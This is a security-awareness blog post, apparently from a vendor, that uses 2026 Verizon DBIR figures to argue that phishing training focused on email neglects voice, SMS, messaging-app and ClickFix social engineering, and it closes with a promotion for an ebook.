TL;DR:

• The 2026 Verizon DBIR found that mobile-centric phishing simulations (voice, SMS, callback) had a median click rate 40% higher than traditional email phishing sims. 
  • The sample size for non-email sims was 35 campaigns, versus 8,395 for email.
  • That is not a small gap in coverage. That is an entire category of risk the security industry is barely measuring.
• 41% of social engineering breaches in the DBIR’s dataset involved a non-email vector: phones, social media, Teams chats, web-based ClickFix lures. 
  • Email is no longer “the” phishing channel. It’s just the one that’s easiest to instrument.
• Legacy awareness programs based on email-based phishing lures are actively training your employees on the least successful attack vector in your environment.

The 2026 DBIR said the quiet part out loud.

Every May, the security industry holds its collective breath while Verizon drops the “Data Breach Investigations Report”: Over 100 pages of forensic, peer-reviewed analysis of what actually broke during the past year. Frankly, it is one of the most honest and comprehensive reports the cybersecurity industry produces.

That’s because the authors aren’t afraid to flag where their own data is thin. For example, buried in the Social Engineering section, the 2026 DBIR research team admits:

Phishing simulation is a well-established business practice, and we have a handful of leading companies in this space as data contributors. On the other hand, we struggled to find companies doing simulations of voice- and text message-based campaigns, which leads to this small-ish sample size. We hope that, for the 2027 DBIR, we will be able to collect more data as additional companies that offer these kinds of services want to participate in this research.

Read that carefully. The DBIR research team is saying they had 8,395 email phishing simulation campaigns to analyze (each dot in their visualization representing 209.88 campaigns)… but only 35 non-email simulation campaigns total. 

That roughly 240-to-1 ratio isn’t a coincidence. It’s the shape of an industry that built itself around the easiest thing to measure and then mistook that thing for the whole problem.

And yet, despite the tiny sample, the data still showed that mobile-centric phishing simulations had a 40% higher median click rate than email: 2% vs. 1.4%. 

When defenders run an experiment with that little data and the underdog channel still wins by that much, the signal is screaming through the noise.

Attackers are phishing outside the email inbox.

The DBIR’s own data shows that 41% of social engineering breaches now involve a vector other than email. That includes:

• Voice (vishing). Pretexting is up sharply this year, with the DBIR specifically calling out attackers impersonating help desk agents and users needing password resets “with moderate levels of success.” 
  • Pretexting reached 6% of all breaches this year, driven in part by a notable number of high-profile ransomware incidents that used it as the initial access action.
• SMS (smishing). Mobile devices in large organizations get hit by a median of 48 SMS-based phishing campaigns per year (12 for smaller orgs), like the currently popular OAuth code smishing attack.
  • That’s a phishing attempt every eight days, and that’s only what shows up on managed devices. Any personal devices used for work are a black box, making your only control an employee being able to recognize fake texts on any device.
• Messaging app pretexting. The “fake IT emergency” playbook the DBIR documents in detail goes something like this: attacker spams the victim’s inbox, then sends a “helpful” Microsoft Teams chat from “the help desk” offering to fix it. The victim hands over remote access, because the attackers won the victim’s trust and cooperation.
  • This “pretext before phishing attempt” pattern has replayed throughout the first half of 2026, from North Korea’s Slack-chat-to-fake-Zoom-call attack on the Axios supply chain, to the pretext-to-voice-phishing authentication bypass attempts currently run by ShinyHunters. (Those start in email, admittedly, but it’s still a great example of the attack pattern strategy that employees can be trained to identify, versus one-off lures.)
• Malvertising and SEO poisoning. Consider the ClickFix malware campaign, in which victims are tricked into pasting a malicious command into their own terminal, often disguised as a CAPTCHA “prove you’re human!” request. Many of these attacks come through malvertising, in which attackers advertise malicious content on social media or search engine results, or SEO poisoning, where naturally ranking websites are infected with ClickFix or other information-stealing malware.
  • With 2.7% of attacks blocked at the browser level, this vector may not be huge, but novel… and growing.

None of these touch the corporate email gateway. None of them get measured by any of the major awareness platforms running phishing simulations today, the ones with “integrated phishing simulation” prominently displayed on their product pages.

And when you have large organizations attacked with mobile-based phishing attacks once every eight days, then email-only training isn’t enough to secure anyone in 2026.

The “walled garden” problem encouraging email phishing simulations

So why have security vendors focused on email phishing simulations more than other channels? It’s not because email is the bigger threat. It’s because many awareness vendors own the inbox, which makes email lures the easiest social engineering type to simulate.

For a very long time, this wasn’t a problem; attackers preferred email as a standard, more easily spun up phishing lure of choice. Everyone was happy with the email phishing simulations.

• Vendors could own the simulation feedback loop from start to finish, analyzing real phish in the inbox to feed a growing (bloated) catalog of emails. 
• Security teams liked that the legacy vendors plugged directly into their owned and managed feeds, making them feel like they could see (and control) everything. 
• Auditors and compliance officers liked the neat data to check their framework box.

But that checkbox became a trap. The regulations are a relic of their time, in which email was the predominant lure that impacted organizations. If they were written today, the intent of the frameworks would force those “email simulation” requirements to reflect the dynamic phishing vectors we’re seeing today.

For legacy security awareness vendors, their entire measurement apparatus lives inside a tidy, walled garden where the vendor controls the rails and security teams feel like they’re in control. 

But in that walled garden model, everything outside of the walls become somebody else’s problem, even as it ultimately creeps into the walled garden: 

• Your employees sideloading insecure apps and browser extensions on personal devices for work because they hate the corporate options
• Private LinkedIn DMs from people asking to “get around” HR bureaucracy for a resume review
• The “authentication request” SMS messages they get while standing in line at Starbucks
• Your best developer joining another “company’s” Slack chat because they don’t feel valued or seen

The walled garden works for security vendors. It does not secure employees or their organizations from today’s social engineering attacks.

The DBIR puts it as politely as possible:

The takeaway reflection here is this: How are users taught to detect these unconventional social engineering attacks? Could you detect someone impersonating your help desk, and by what means can your users be reached on your devices?

I’ll be less polite: If your awareness program prioritizes email phishing lures over any other type of social engineering, you are not measuring human risk.

Instead, you’re measuring the easy thing, calling it human risk, and crossing your fingers that the actually-dangerous stuff happens in front of your email security gateway. (If other orgs’ data is anything to go by, it won’t.)

The personal-to-professional carryover compounds the problem. 

As the 2026 DBIR notes in references to last year’s BYOD and infostealer analysis, employees commonly have corporate credentials sitting on personal devices. The social engineering channels attackers use to reach those devices are precisely the ones legacy awareness programs often fail to cover. 

Your employees aren’t a 9-to-5 attack surface. Help them be discerning everywhere, or be ready to absorb the spillover.

What the 2026 DBIR research actually means for effective security awareness programs

A few concrete shifts to consider, in rough order of leverage:

• Audit your training topic mix. Stop training on yet another phishing lure format, and start diversifying your training topics. A modern security awareness program must teach employees about relevant, updated social engineering attempts of all types, from prompt injections and calendar invites to text-based and voice-based attacks. 
  • If the 2026 DBIR’s dataset is correct, then email-only security awareness programs are teaching employees about roughly 60% of the actual problem, while calling it 100%.
• Stop using reporting rates as a proxy for behavior change. The DBIR’s data is full of employees who recognize email phish patterns instantly because they’ve been drilled for fifteen years… and then get hit by a phone call from “IT” and hand over the keys. 
  • Pattern recognition in one channel won’t transfer to all of them, because the pretexting context changes.
• Engage with employees as whole humans. The personal-to-professional discernment carryover is real, and it’s the highest-leverage cultural work in human risk right now. 
  • Talk to your employees about the scams targeting them, not just the ones targeting your corporate inbox.
• Push your vendors on modern social engineering tactics instead of focusing on email click rates. When a security awareness vendor brags about their email click rate trending down, ask them how they’ve helped employees identify the same urgency and reciprocity social engineering flags for voice phishing, or in text messages, or over social media DMs. If they can’t, and most can’t, then you’ve learned something useful about whose problem they think security really is.

One last thing about the 2026 DBIR: Please read it yourself.

Read the 2026 DBIR, and don’t just ask your AI tool of choice to process a summary.

Don’t stop at the executive summary or read someone else’s take on the report with their point of view (and yes, I’m aware of the irony). 

Read the whole thing, especially the Social Engineering pattern (starts on p. 47) and the “Multipronged social approach” subsection. 

It’s free (minus your email address), the writing is genuinely funny in places, and the methodology section will make you a better consumer of every other security report you read this year.

And if you’re curious about what some of these lures look like in real life (and what you could do to stop it), then check out Fable Security’s free ebook, “One ish, two ish: How to prevent modern phishing” to learn more about how modern phishing actually works across email, voice, text, and everything else attackers throw at your employees.